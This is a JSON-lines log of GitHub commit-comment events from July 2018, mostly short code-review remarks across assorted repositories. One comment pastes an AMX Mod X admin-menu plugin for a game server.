{"id":"7907177048","type":"CommitCommentEvent","actor":{"login":"fh1ch"},"repo":{"name":"max-wittig/node-gitlab"},"payload":{"comment":{"id":29567865,"position":4,"line":69,"path":"package.json","commit_id":"b88369814759769dd5247c8f2b671be01112183b","created_at":"2018-07-02T14:53:44Z","updated_at":"2018-07-02T14:53:44Z","author_association":"NONE","body":"JavaScript is event loop based. The `sleep` packages fiddles around with **native** bindings and fiddles around with the event loop (see https://www.npmjs.com/package/sleep). This is some serious hacky work.\r\n\r\nUse setTimeout and proper async/await pattern."}},"created_at":"2018-07-02T14:53:44Z"}
{"id":"7907177513","type":"CommitCommentEvent","actor":{"login":"captn3m0"},"repo":{"name":"Aagosh10/pincode_project"},"payload":{"comment":{"id":29567866,"position":9,"line":9,"path":"app/Models/pincodeModel.php","commit_id":"59bbd7a3b189c18f6182c5955a592d0a5304acb4","created_at":"2018-07-02T14:53:49Z","updated_at":"2018-07-02T14:53:49Z","author_association":"NONE","body":"https://www.php-fig.org/psr/psr-4/"}},"created_at":"2018-07-02T14:53:49Z"}
{"id":"7907180110","type":"CommitCommentEvent","actor":{"login":"MichalBafikybaf"},"repo":{"name":"MichalBafikybaf/Adminmenu"},"payload":{"comment":{"id":29567872,"position":null,"line":null,"path":null,"commit_id":"0e4ae053e6fa2db6c400d4f1ce1b7902534c87e9","created_at":"2018-07-02T14:54:15Z","updated_at":"2018-07-02T14:54:15Z","author_association":"OWNER","body":"/* Plugin generated by AMXX-Studio */\r\n\r\n#include <amxmodx>\r\n#include <amxmisc>\r\n\r\n#define PLUGIN \"Basic Admin Menu\"\r\n#define VERSION \"1.0\"\r\n#define AUTHOR \"Blizzard\"\r\n\r\n\r\npublic plugin_init() {\r\n\tregister_plugin(PLUGIN, VERSION, AUTHOR)\r\n\t\r\n\tregister_clcmd(\"say /amenu\", \"AdminMenu\", ADMIN_BAN);\r\n\tregister_concmd(\"amenu\", \"AdminMenu\", ADMIN_BAN);\r\n         register_concmd(\"amx_revive\",\"menurevive\", ADMIN_BAN);\r\n}\r\n public AdminMenu(id)\r\n {\r\n\r\n    new menu = menu_create(\"\\rAdmin Menu\", \"AdminMenu_handler\");\r\n\r\n    menu_additem(menu, \"\\wKick Menu\", \"1\", 0);\r\n    menu_additem(menu, \"\\wBan Menu\", \"2\", 0);\r\n    menu_additem(menu, \"\\wUhodit/Zabit Menu\", \"3\", 0);\r\n    menu_additem(menu, \"\\wTeam Menu\", \"4\", 0);\r\n    menu_additem(menu, \"\\wZmena Map\", \"5\", 0);\r\n    menu_additem(menu, \"\\wZacit hlasovani\", \"6\", 0);\r\n    menu_additem(menu, \"\\wRespawn menu\", \"7\", 0)\r\n    \r\n    menu_setprop(menu, MPROP_EXIT, MEXIT_ALL);\r\n\r\n    menu_display(id, menu, 0);\r\n}\r\n public AdminMenu_handler(id, menu, item)\r\n {\r\n  \r\n    if( item == MENU_EXIT )\r\n    {\r\n        menu_destroy(menu);\r\n \r\n        return PLUGIN_HANDLED;\r\n    }\r\n\r\n\r\n    new data[6], szName[64];\r\n    new access, callback;\r\n\r\n    menu_item_getinfo(menu, item, access, data,charsmax(data), szName,charsmax(szName), callback);\r\n    \r\n    new key = str_to_num(data);\r\n\r\n    switch(key)\r\n    {\r\n        case 1:\r\n        {\r\n         client_cmd(id, \"amx_kickmenu\");\r\n        }\r\n        case 2:\r\n        {\r\n         client_cmd(id, \"amx_banmenu\");\r\n        }\r\n        case 3:\r\n        {\r\n         client_cmd(id, \"amx_slapmenu\");\r\n        }\r\n        case 4:\r\n        {\r\n         client_cmd(id, \"amx_teammenu\");\r\n        }\r\n        case 5:\r\n        {\r\n         client_cmd(id, \"amx_mapmenu\");\r\n        }\r\n        case 6:\r\n        {\r\n         client_cmd(id, \"amx_votemapmenu\");\r\n        }\r\n        case 7:\r\n        { \r\n\tclient_cmd(id, \"amx_revive\");\r\n    }\r\n\r\n    menu_destroy(menu);\r\n    return PLUGIN_HANDLED;\r\n }\r\n \r\npublic menurevive(id)\r\n{ \r\n\tif(!(get_user_flags(id) & ADMIN_BAN))\r\n\t{\r\n\t\tColorChat(id, GREY,\"^3Nemas opravneni pro tohle menu!\")\r\n\t\treturn PLUGIN_HANDLED\r\n\t}\r\n\t\r\n\tnew szText[555 char]\r\n\t\r\n\tformatex(szText, charsmax(szText), \"\\gRespawn menu\")\r\n\tnew AdminMenu = menu_create(szText, \"menuMainHandle\")\r\n\t\r\n\tformatex(szText, charsmax(szText), \"\\wRespawnout hrace\")\r\n\tmenu_additem(AdminMenu, szText, \"1\", 0)\r\n\t\r\n\tformatex(szText, charsmax(szText), \"\\wRespawnout sebe!\")\r\n\tmenu_additem(AdminMenu, szText, \"2\", 0)\r\n\t\r\n\treturn PLUGIN_HANDLED\r\n}\r\n\r\npublic menuMainHandle(id,menu,item){\r\n\tif (item == MENU_EXIT)\r\n\t{\r\n\t\tmenu_destroy(menu)\r\n\t\treturn PLUGIN_HANDLED\r\n\t}\t\r\n\tnew data[6], iName[64], access, callback\r\n\tmenu_item_getinfo(menu, item, access, data, 5, iName, 63, callback)\r\n\t\r\n\tnew key = str_to_num(data)\r\n\t\r\n\tswitch(key)\r\n\t{\r\n\t\tcase 1:\r\n\t\t{\r\n\t\t\tReviveMenu(id)\t\r\n\t\t}\r\n\t\tcase 2:\r\n\t\t{\r\n\t\t\tExecuteHamB(Ham_CS_RoundRespawn, id)\r\n\t\t\tRespawnself(id)\r\n\t\t}\r\n\t}\r\n\treturn PLUGIN_HANDLED\r\n}\r\n\r\n\r\npublic ReviveMenu(id)\r\n{\r\n\tnew RevivePlayer = menu_create (\"\\r Respawn hrace\", \"HandleRevive\")\r\n\t\r\n\tnew num, players[32], tempid, szTempID [10], tempname [32]\r\n\tget_players (players, num, \"b\")\r\n\t\r\n\tfor (new i = 0; i < num; i++)\r\n\t{\r\n\t\ttempid = players [ i ]\r\n\t\t\r\n\t\tget_user_name (tempid, tempname, 31)\r\n\t\tnum_to_str (tempid, szTempID, 9)\r\n\t\tmenu_additem (RevivePlayer, tempname, szTempID, 0)\r\n\t}\r\n\t\r\n\tmenu_display (id, RevivePlayer)\r\n\treturn PLUGIN_HANDLED\r\n}\r\n\r\npublic HandleRevive(id, menu, item)\r\n{\r\n\tif(item == MENU_EXIT)\r\n\t{\r\n\t\tmenu_destroy(menu)\r\n\t\treturn PLUGIN_HANDLED\r\n\t}\r\n\t\r\n\tnew data[6], name[64],szPlayerName[33],szName[33]\r\n\tnew access, callback\r\n\t\r\n\tmenu_item_getinfo (menu, item, access, data, 5, name, 63, callback)\r\n\tnew tempid = str_to_num (data)\r\n\t\r\n\tget_user_name(id, szName, charsmax(szName))\r\n\tget_user_name(tempid, szPlayerName, charsmax(szPlayerName))\r\n\t\r\n\tColorChat(0, RED, \"^4 ^1ADMIN ^4%s ^1Ozivil ^4%s ^1!!\", szName, szPlayerName)\r\n\t\r\n\tExecuteHamB(Ham_CS_RoundRespawn, tempid)\r\n\tmenu_destroy(menu);\r\n\tReviveMenu(id)\r\n\treturn PLUGIN_CONTINUE\r\n}\r\nRespawnself(id)\r\n{\r\n\tstatic szName[32];\r\n\tget_user_name(id ,szName , 33)\r\n\tColorChat(id, GREY,\"^4 ^1ADMIN ^4%s ^1Ozivil sebe ^3!!\", szName)\r\n}\r\n\r\n"}},"created_at":"2018-07-02T14:54:15Z"}
{"id":"7907182371","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567878,"position":1,"line":23,"path":"log/src/main/java/com/axway/ats/log/appenders/PassiveDbAppender.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:54:37Z","updated_at":"2018-07-02T14:54:37Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:54:37Z"}
{"id":"7907183650","type":"CommitCommentEvent","actor":{"login":"fh1ch"},"repo":{"name":"max-wittig/node-gitlab"},"payload":{"comment":{"id":29567880,"position":42,"line":66,"path":"src/infrastructure/RequestHelper.js","commit_id":"b88369814759769dd5247c8f2b671be01112183b","created_at":"2018-07-02T14:54:50Z","updated_at":"2018-07-02T14:54:50Z","author_association":"NONE","body":"This is a really bad pattern and also almost never used in javascript. Try to go for recursion if really required."}},"created_at":"2018-07-02T14:54:50Z"}
{"id":"7907184921","type":"CommitCommentEvent","actor":{"login":"jwerardi"},"repo":{"name":"tmricciardi/yt-socket"},"payload":{"comment":{"id":29567883,"position":null,"line":null,"path":null,"commit_id":"6f7b161c2c547c669711c9f972edd5c00eacbb8d","created_at":"2018-07-02T14:55:02Z","updated_at":"2018-07-02T14:55:02Z","author_association":"NONE","body":"```\r\nsocket.emit(\"newConnection\", () => {\r\n\tsocket.on(\"connectTime\", currentTime => {\r\n        \tplayer.seekTo(currentTime);\r\n\t});\r\n});\r\n```\r\n\r\nlike this?"}},"created_at":"2018-07-02T14:55:02Z"}
{"id":"7907187225","type":"CommitCommentEvent","actor":{"login":"fh1ch"},"repo":{"name":"max-wittig/node-gitlab"},"payload":{"comment":{"id":29567887,"position":42,"line":66,"path":"src/infrastructure/RequestHelper.js","commit_id":"b88369814759769dd5247c8f2b671be01112183b","created_at":"2018-07-02T14:55:25Z","updated_at":"2018-07-02T14:55:25Z","author_association":"NONE","body":"Why do you repeat the whole request flow in case of a 429? The only request to be retried is `await getPaginated`"}},"created_at":"2018-07-02T14:55:25Z"}
{"id":"7907190342","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29567890,"position":null,"line":null,"path":null,"commit_id":"97a3c71d8be36a5444c28a77782ab75b0f479060","created_at":"2018-07-02T14:55:57Z","updated_at":"2018-07-02T14:55:57Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-24](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-24).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-24-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-02T14:55:57Z"}
{"id":"7907195494","type":"CommitCommentEvent","actor":{"login":"bitzgx"},"repo":{"name":"bitzgx/test"},"payload":{"comment":{"id":29567898,"position":null,"line":null,"path":null,"commit_id":"da14fdee4730897098c6038f7d10bf8a4b53ad10","created_at":"2018-07-02T14:56:50Z","updated_at":"2018-07-02T14:56:50Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-02T14:56:50Z"}
{"id":"7907196253","type":"CommitCommentEvent","actor":{"login":"wborn"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":29567900,"position":164,"line":126,"path":"docs/documentation/concepts/units-of-measurement.md","commit_id":"7c3a53c83e11d50ee88afe86a16333e5d6b8713d","created_at":"2018-07-02T14:56:58Z","updated_at":"2018-07-02T14:56:58Z","author_association":"CONTRIBUTOR","body":"Metre is British and Meter is the American way of spelling the unit. In programming the American spelling is usually more common."}},"created_at":"2018-07-02T14:56:58Z"}
{"id":"7907199771","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29567905,"position":null,"line":null,"path":null,"commit_id":"29b860e47d4395793dba4fc7d1898acb95e7afb0","created_at":"2018-07-02T14:57:34Z","updated_at":"2018-07-02T14:57:34Z","author_association":"COLLABORATOR","body":"Puzzle `1291-e0f9fdc9` discovered in   [`src/main/groovy/com/zerocracy/stk/pm/cost/funding/send_zold.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/cost/funding/send_zold.groovy)   and submitted as #1311. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T14:57:34Z"}
{"id":"7907200467","type":"CommitCommentEvent","actor":{"login":"fh1ch"},"repo":{"name":"max-wittig/node-gitlab"},"payload":{"comment":{"id":29567906,"position":76,"line":100,"path":"src/infrastructure/RequestHelper.js","commit_id":"b88369814759769dd5247c8f2b671be01112183b","created_at":"2018-07-02T14:57:41Z","updated_at":"2018-07-02T14:57:41Z","author_association":"NONE","body":"Why do you have a `+` here? Number conversion should work like `Number(myVar)`."}},"created_at":"2018-07-02T14:57:41Z"}
{"id":"7907208896","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-3-js"},"payload":{"comment":{"id":29567920,"position":null,"line":null,"path":null,"commit_id":"9e81ab19390b06bb7d7b2d965751905f167e543c","created_at":"2018-07-02T14:59:05Z","updated_at":"2018-07-02T14:59:05Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-02T14:59:05Z"}
{"id":"7907211580","type":"CommitCommentEvent","actor":{"login":"fh1ch"},"repo":{"name":"max-wittig/node-gitlab"},"payload":{"comment":{"id":29567924,"position":12,"line":10,"path":"src/infrastructure/XMLHttpRequester.js","commit_id":"b88369814759769dd5247c8f2b671be01112183b","created_at":"2018-07-02T14:59:31Z","updated_at":"2018-07-02T14:59:31Z","author_association":"NONE","body":"Is there any reason, that you created a named function here?"}},"created_at":"2018-07-02T14:59:31Z"}
{"id":"7907212443","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567925,"position":1,"line":47,"path":"log/src/main/java/com/axway/ats/log/autodb/DbAccessFactory.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:59:40Z","updated_at":"2018-07-02T14:59:40Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:59:40Z"}
{"id":"7907213489","type":"CommitCommentEvent","actor":{"login":"hasibzunair"},"repo":{"name":"hasibzunair/hasibzunair.github.io"},"payload":{"comment":{"id":29567926,"position":null,"line":null,"path":null,"commit_id":"8973e004125c2c157da894ad2e2b5b34b3b0c86b","created_at":"2018-07-02T14:59:49Z","updated_at":"2018-07-02T14:59:49Z","author_association":"OWNER","body":"image file changed for digit competition"}},"created_at":"2018-07-02T14:59:49Z"}
{"id":"7907219247","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29567940,"position":23,"line":41,"path":"src/main/java/com/ewp/crm/controllers/VkController.java","commit_id":"db9e67f9ebe0c808458a3f87f84c2339e6737a11","created_at":"2018-07-02T15:00:45Z","updated_at":"2018-07-02T15:00:45Z","author_association":"NONE","body":"очень странное решение обсудим на скраме"}},"created_at":"2018-07-02T15:00:45Z"}
{"id":"7907223411","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29567946,"position":19,"line":19,"path":"src/main/java/com/ewp/crm/configs/FacebookConfigImpl.java","commit_id":"89f79babc29cf60668b2335541b415826ca9e672","created_at":"2018-07-02T15:01:24Z","updated_at":"2018-07-02T15:01:24Z","author_association":"NONE","body":"удалить"}},"created_at":"2018-07-02T15:01:24Z"}
{"id":"7907224654","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29567950,"position":30,"line":30,"path":"src/main/java/com/ewp/crm/configs/FacebookConfigImpl.java","commit_id":"89f79babc29cf60668b2335541b415826ca9e672","created_at":"2018-07-02T15:01:37Z","updated_at":"2018-07-02T15:01:37Z","author_association":"NONE","body":"удалить если не нужно"}},"created_at":"2018-07-02T15:01:37Z"}
{"id":"7907226552","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29567952,"position":21,"line":44,"path":"src/main/java/com/ewp/crm/configs/initializer/DataInitializer.java","commit_id":"89f79babc29cf60668b2335541b415826ca9e672","created_at":"2018-07-02T15:01:51Z","updated_at":"2018-07-02T15:01:51Z","author_association":"NONE","body":"удалить"}},"created_at":"2018-07-02T15:01:51Z"}
{"id":"7907227503","type":"CommitCommentEvent","actor":{"login":"valeria1011"},"repo":{"name":"blockchain/api-v1-client-python"},"payload":{"comment":{"id":29567953,"position":null,"line":null,"path":null,"commit_id":"a107a5b833e61859cab872e3bc6b6d49fb2c478e","created_at":"2018-07-02T15:02:01Z","updated_at":"2018-07-02T15:02:01Z","author_association":"NONE","body":"[About.txt](https://github.com/blockchain/api-v1-client-python/files/2155704/About.txt)\r\n"}},"created_at":"2018-07-02T15:02:01Z"}
{"id":"7907230435","type":"CommitCommentEvent","actor":{"login":"szeiger"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29567959,"position":null,"line":null,"path":null,"commit_id":"8d111b612f3cbfc4d3769a5c470829bfe7fcdfea","created_at":"2018-07-02T15:02:31Z","updated_at":"2018-07-02T15:02:31Z","author_association":"CONTRIBUTOR","body":"@lrytz Thanks, `mkAttributedThis` was indeed the missing part.\r\n\r\n@retronym I expected the `getClass()` version to lead to more compact bytecode but apparently I was wrong. A quick test shows 7793 bytes for `List$.class` with `getClass()` vs 7748 bytes with the class literal."}},"created_at":"2018-07-02T15:02:31Z"}
{"id":"7907234341","type":"CommitCommentEvent","actor":{"login":"adamhooper"},"repo":{"name":"CJWorkbench/cjworkbench"},"payload":{"comment":{"id":29567967,"position":22,"line":53,"path":"server/dynamicdispatch.py","commit_id":"698ff95aa83b85c1f363000fe8f5e21808467c45","created_at":"2018-07-02T15:03:10Z","updated_at":"2018-07-02T15:03:10Z","author_association":"CONTRIBUTOR","body":"Fixed -- now sanitize_dataframe() only gets called once for static, once for dynamic. (Longer-term ... there's no functional difference between static and dynamic modules, so they should probably all use dynamicdispatch.py's approach.)"}},"created_at":"2018-07-02T15:03:10Z"}
{"id":"7907235936","type":"CommitCommentEvent","actor":{"login":"sjrd"},"repo":{"name":"sjrd/scala-js"},"payload":{"comment":{"id":29567975,"position":null,"line":null,"path":null,"commit_id":"caaf3a947ca37ec49447b8b12633de7a1d70fced","created_at":"2018-07-02T15:03:26Z","updated_at":"2018-07-02T15:03:26Z","author_association":"OWNER","body":"Review by @gzm0 for fast-forward on master."}},"created_at":"2018-07-02T15:03:26Z"}
{"id":"7907237274","type":"CommitCommentEvent","actor":{"login":"abreinig"},"repo":{"name":"amix/vimrc"},"payload":{"comment":{"id":29567980,"position":null,"line":null,"path":null,"commit_id":"f2c382d80ed53b27b4d8aa7bcfab174d4d291566","created_at":"2018-07-02T15:03:41Z","updated_at":"2018-07-02T15:03:41Z","author_association":"NONE","body":"Strange to allow  a personal preference change like this into the master."}},"created_at":"2018-07-02T15:03:41Z"}
{"id":"7907247136","type":"CommitCommentEvent","actor":{"login":"m-bosch"},"repo":{"name":"MultiPoolMiner/MultiPoolMiner"},"payload":{"comment":{"id":29567995,"position":null,"line":null,"path":null,"commit_id":"01209ddb59f5936c9510799c8f20e792c41728c4","created_at":"2018-07-02T15:05:19Z","updated_at":"2018-07-02T15:05:19Z","author_association":"NONE","body":"Why is this example removed?"}},"created_at":"2018-07-02T15:05:19Z"}
{"id":"7907251875","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568004,"position":1,"line":15,"path":"log/src/main/java/com/axway/ats/log/autodb/DbAppenderConfiguration.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:06:08Z","updated_at":"2018-07-02T15:06:08Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:06:08Z"}
{"id":"7907260878","type":"CommitCommentEvent","actor":{"login":"m-bosch"},"repo":{"name":"MultiPoolMiner/MultiPoolMiner"},"payload":{"comment":{"id":29568029,"position":null,"line":null,"path":null,"commit_id":"95ec87f6176a977955711b7c1e5cbf84a50ad2a7","created_at":"2018-07-02T15:07:47Z","updated_at":"2018-07-02T15:07:47Z","author_association":"NONE","body":"How does de config.txt now work? Does it still work? the example file is removed?"}},"created_at":"2018-07-02T15:07:47Z"}
{"id":"7907263703","type":"CommitCommentEvent","actor":{"login":"tomoharutsutsumi"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29568034,"position":72,"line":96,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T15:08:19Z","updated_at":"2018-07-02T15:08:19Z","author_association":"OWNER","body":"@ms2sato else index % 2 != 0という書き方はできないというように考えていました。"}},"created_at":"2018-07-02T15:08:19Z"}
{"id":"7907266371","type":"CommitCommentEvent","actor":{"login":"pierre-emmanuelJ"},"repo":{"name":"exoscale/egoscale"},"payload":{"comment":{"id":29568044,"position":null,"line":null,"path":null,"commit_id":"bedd0cfd1e2ea4816a1ab4d9562bc4787df6b478","created_at":"2018-07-02T15:08:49Z","updated_at":"2018-07-02T15:08:49Z","author_association":"MEMBER","body":"https://github.com/exoscale/egoscale/issues/204"}},"created_at":"2018-07-02T15:08:49Z"}
{"id":"7907266573","type":"CommitCommentEvent","actor":{"login":"brianjdaigle"},"repo":{"name":"brianjdaigle/browser-scripts"},"payload":{"comment":{"id":29568045,"position":null,"line":null,"path":null,"commit_id":"a184a35d3ab4ad7e5b606263e0ecc4fca24e576d","created_at":"2018-07-02T15:08:51Z","updated_at":"2018-07-02T15:08:51Z","author_association":"OWNER","body":"Copied script from Tampermonkey"}},"created_at":"2018-07-02T15:08:51Z"}
{"id":"7907272949","type":"CommitCommentEvent","actor":{"login":"jonm8"},"repo":{"name":"TESMedia/FileCleaner"},"payload":{"comment":{"id":29568059,"position":null,"line":null,"path":null,"commit_id":"bb2f3abae3ab3ccd49b621f09038e15cd0856b59","created_at":"2018-07-02T15:09:59Z","updated_at":"2018-07-02T15:09:59Z","author_association":"CONTRIBUTOR","body":"Updates to cleaning process"}},"created_at":"2018-07-02T15:09:59Z"}
{"id":"7907273648","type":"CommitCommentEvent","actor":{"login":"jendrikseipp"},"repo":{"name":"jendrikseipp/vulture"},"payload":{"comment":{"id":29568061,"position":63,"line":49,"path":"tests/test_make_whitelist.py","commit_id":"a283f514842f4bb46ae27486664c9792aeb5194a","created_at":"2018-07-02T15:10:07Z","updated_at":"2018-07-02T15:10:07Z","author_association":"OWNER","body":"I think we should be able to support this by printing `this  # unused import (...)`. Please test for \r\n\r\n* `import foo`\r\n* `import foo as bar`\r\n* `from foo import bar`\r\n* `from foo import bar as baz`"}},"created_at":"2018-07-02T15:10:07Z"}
{"id":"7907279576","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29568069,"position":null,"line":null,"path":null,"commit_id":"e3be8d19a7af363e96f667aafa9acf8baebddf6d","created_at":"2018-07-02T15:11:09Z","updated_at":"2018-07-02T15:11:09Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-24-d8train.pantheonsite.io/)\n\nCreated multidev environment [ci-24](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#ci-24) for d8train."}},"created_at":"2018-07-02T15:11:09Z"}
{"id":"7907282826","type":"CommitCommentEvent","actor":{"login":"berkas1"},"repo":{"name":"Vaizard/mage-base-common"},"payload":{"comment":{"id":29568074,"position":null,"line":null,"path":null,"commit_id":"df22d91e4d994b6234983ffc298fb12d754da93c","created_at":"2018-07-02T15:11:43Z","updated_at":"2018-07-02T15:11:43Z","author_association":"MEMBER","body":"Sorry for this mistake. Revert commit pusher."}},"created_at":"2018-07-02T15:11:43Z"}
{"id":"7907288667","type":"CommitCommentEvent","actor":{"login":"isonil"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29568084,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T15:12:40Z","updated_at":"2018-07-02T15:12:40Z","author_association":"CONTRIBUTOR","body":"@mora145 \r\n\r\nYou first need to replace `[ \\t]*<([^<>]+rulesStrings)\\.0>([^<]+)<\\/([^<>]+)>` with `\\t<$1>#addclosetag\\n\\t<$1.0>$2</$3>`\r\n\r\nthen `[ \\t]*<([^<>]+rulesStrings)\\.[0-9]+>([^<]+)<\\/([^<>]+)>` with `\\t\\t<li>$2</li>`\r\n\r\nand then `(?s)<([^<>]+rulesStrings)>#addclosetag(((?!(<[^\\/](?!(i>)))).)*)</li>` with `<$1>$2</li>\\n\\t</$1>`\r\n\r\nSo you have to open the search and replace window 3 times.\r\n\r\nYou can use the \"Find in Files\" tab to replace all occurrences in all files."}},"created_at":"2018-07-02T15:12:40Z"}
{"id":"7907290139","type":"CommitCommentEvent","actor":{"login":"Prunt"},"repo":{"name":"TheXManGuy/Wabariik"},"payload":{"comment":{"id":29568087,"position":null,"line":null,"path":null,"commit_id":"65c778fafa122872780fd699798786bf842f71f1","created_at":"2018-07-02T15:12:54Z","updated_at":"2018-07-02T15:12:54Z","author_association":"NONE","body":"1. Sõna volitus asemel oleme kasutanud pigem `õigus`: `Sul pole selleks piisavalt õigusi.`\r\n2. `Flag` ei ole eesti keeles päris `lipp`, selle all on mõeldud nt `säte`.\r\n3. `ilutulestiku` on valesti kirjutatud: osastavas käändes on see `ilutulestikku`.\r\n4. Real 14 on sõnad `for` ja `in` tõlkimata.\r\n5. Real 19 ei ole mõeldud sõna `pealt`, vaid `hind`."}},"created_at":"2018-07-02T15:12:54Z"}
{"id":"7907293307","type":"CommitCommentEvent","actor":{"login":"rmja"},"repo":{"name":"aurelia/templating-router"},"payload":{"comment":{"id":29568095,"position":null,"line":null,"path":null,"commit_id":"38f9dc4dc7c4af60b21bf7d1e5b40f7f4e10433d","created_at":"2018-07-02T15:13:24Z","updated_at":"2018-07-02T15:13:24Z","author_association":"NONE","body":"Yes please, this is currently breaking our app as it gets bundled with both v1 and v2 of aurelia-binding"}},"created_at":"2018-07-02T15:13:24Z"}
{"id":"7907294060","type":"CommitCommentEvent","actor":{"login":"isabellechiu"},"repo":{"name":"isabellechiu/Guided-Project-Creating-a-Kaggle-Workflow"},"payload":{"comment":{"id":29568097,"position":null,"line":null,"path":null,"commit_id":"05b28c581e7b9ea0e25d91325114a598f691f110","created_at":"2018-07-02T15:13:32Z","updated_at":"2018-07-02T15:13:32Z","author_association":"OWNER","body":"initial version"}},"created_at":"2018-07-02T15:13:32Z"}
{"id":"7907301714","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29568105,"position":null,"line":null,"path":null,"commit_id":"222ae3093e301e77bca259d2b4015bcfb7150156","created_at":"2018-07-02T15:14:56Z","updated_at":"2018-07-02T15:14:56Z","author_association":"NONE","body":"map delayed another 2 days because it took too long"}},"created_at":"2018-07-02T15:14:56Z"}
{"id":"7907302296","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"sdana/weather-app"},"payload":{"comment":{"id":29568107,"position":null,"line":null,"path":null,"commit_id":"41f9abb0cf8f692a30d1b8155143497859d4c603","created_at":"2018-07-02T15:15:03Z","updated_at":"2018-07-02T15:15:03Z","author_association":"NONE","body":"When I run grunt, it seems to build the dist at the root! I think you pushed just the src file as the entire repo. This is fine, just be aware for future to have the src nested inside the repo directory itself. 👍 "}},"created_at":"2018-07-02T15:15:03Z"}
{"id":"7907306216","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Omnia-Contentus"},"payload":{"comment":{"id":29568117,"position":null,"line":null,"path":null,"commit_id":"f790174be0ade318c4da4bd18878ad957446974a","created_at":"2018-07-02T15:15:44Z","updated_at":"2018-07-02T15:15:44Z","author_association":"NONE","body":"map scheduled 2 days earlier because the title of the commit reminds me of \"Oh hello there!\" by Shrek"}},"created_at":"2018-07-02T15:15:44Z"}
{"id":"7907309018","type":"CommitCommentEvent","actor":{"login":"danielgolden"},"repo":{"name":"Masterworks/Clarity-Components"},"payload":{"comment":{"id":29568125,"position":null,"line":null,"path":null,"commit_id":"d1552771d0c15ee55ff2eeba7202b9625fc1354f","created_at":"2018-07-02T15:16:13Z","updated_at":"2018-07-02T15:16:13Z","author_association":"COLLABORATOR","body":"@Chitradip-Capitalnumbers Please use more detailed commit messages than \"style updated\", this doesn't provide enough information."}},"created_at":"2018-07-02T15:16:13Z"}
{"id":"7907309487","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29568127,"position":5,"line":6600,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"12d639fe332954cdac907eef1bb391b13ab95060","created_at":"2018-07-02T15:16:18Z","updated_at":"2018-07-02T15:16:18Z","author_association":"COLLABORATOR","body":"I don't quite get this, is this like _değer girmek_, to input values?"}},"created_at":"2018-07-02T15:16:18Z"}
{"id":"7907309807","type":"CommitCommentEvent","actor":{"login":"wuyaf"},"repo":{"name":"wuyaf/-"},"payload":{"comment":{"id":29568132,"position":1,"line":1,"path":"README.md","commit_id":"3cfbda28f6ee423da9cfc1468a9003e540e7757c","created_at":"2018-07-02T15:16:22Z","updated_at":"2018-07-02T15:16:22Z","author_association":"OWNER","body":"t17.edd778.com站点"}},"created_at":"2018-07-02T15:16:22Z"}
